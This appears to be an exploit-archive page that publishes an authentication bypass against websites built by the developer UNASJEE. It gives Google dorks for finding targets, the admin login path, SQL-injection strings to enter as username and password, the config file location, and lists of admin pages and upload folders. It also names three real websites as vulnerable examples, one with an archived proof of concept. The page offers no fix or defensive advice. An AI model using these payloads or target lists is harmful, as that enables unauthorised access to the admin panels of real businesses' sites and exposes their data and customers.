Design and Developed By UNASJEE Authentication Bypass Vulnerability

2018.09.22

KingSkrupellos (GB)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-592

Dork: intext:''Designed & Developed by: UNASJEE'' - intext:''Developed by: UNASJEE''

#################################################################################################
# Exploit Title : Design and Developed By UNASJEE Authentication Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 23/09/2018
# Vendor Homepage : unasjee.net
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 - [ Authentication Bypass Issues ]
#################################################################################################
# Google Dork :
intext:''Designed & Developed by: UNASJEE''
intext:''Developed by: UNASJEE''
# Admin Control Panel Path : /admincp/index.php
# Exploit :
Admin Username : '=''or'
Admin Password : '=''or'
# Configuration File Directory Path : /admincp/config.inc
# Useable Admin Control Panel URL Links =>
/admincp/mmainsections.php
/admincp/edititem.php
/admincp/allproducts2.php?sort=isNew
/admincp/allproducts2.php?sort=isSug
/admincp/allproducts.php?sort=order%20by%20ItmName
/admincp/allproducts.php?sort=order%20by%20ArtNo
/admincp/allproducts2.php?sort=soption
/admincp/vinquiries.php
/admincp/mnews.php
/admincp/editemail2.php
/admincp/newsletters.php
/admincp/links.php
/admincp/sendnewsletters.php
/admincp/changepass.php
/admincp/profile.php
/admincp/contact2.php
/admincp/f-view.php
/admincp/ani.php
# Directory File Paths =>
/admincp/sdata/itmimgs/....
/admincp/sdata/banner/....
/admincp/sdata/fviewimgs/...
/admincp/sdata/itmimgs/...
/admincp/sdata/mainimgs/...
/admincp/sdata/mimgs/...
/admincp/sdata/msecimgs/...
/admincp/sdata/nextimgs/...
/admincp/sdata/secbanner/...
/admincp/sdata/secimgs/..
/admincp/sdata/subimgs/...
#################################################################################################
# Example Vulnerable Sites =>
tbshandtools.com/admincp/index.php => [ Proof of Concept ] => archive.is/3fTzD
chableather.com/admincp/index.php
fadensports.com/admincp/config.inc
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################

References:

https://www.cyberizm.org/cyberizm-design-by-unasjee-authentication-bypass-vuln.html

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Design and Developed By UNASJEE Authentication Bypass Vulnerability

Dork: intext:''Designed & Developed by: UNASJEE'' - intext:''Developed by: UNASJEE''

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.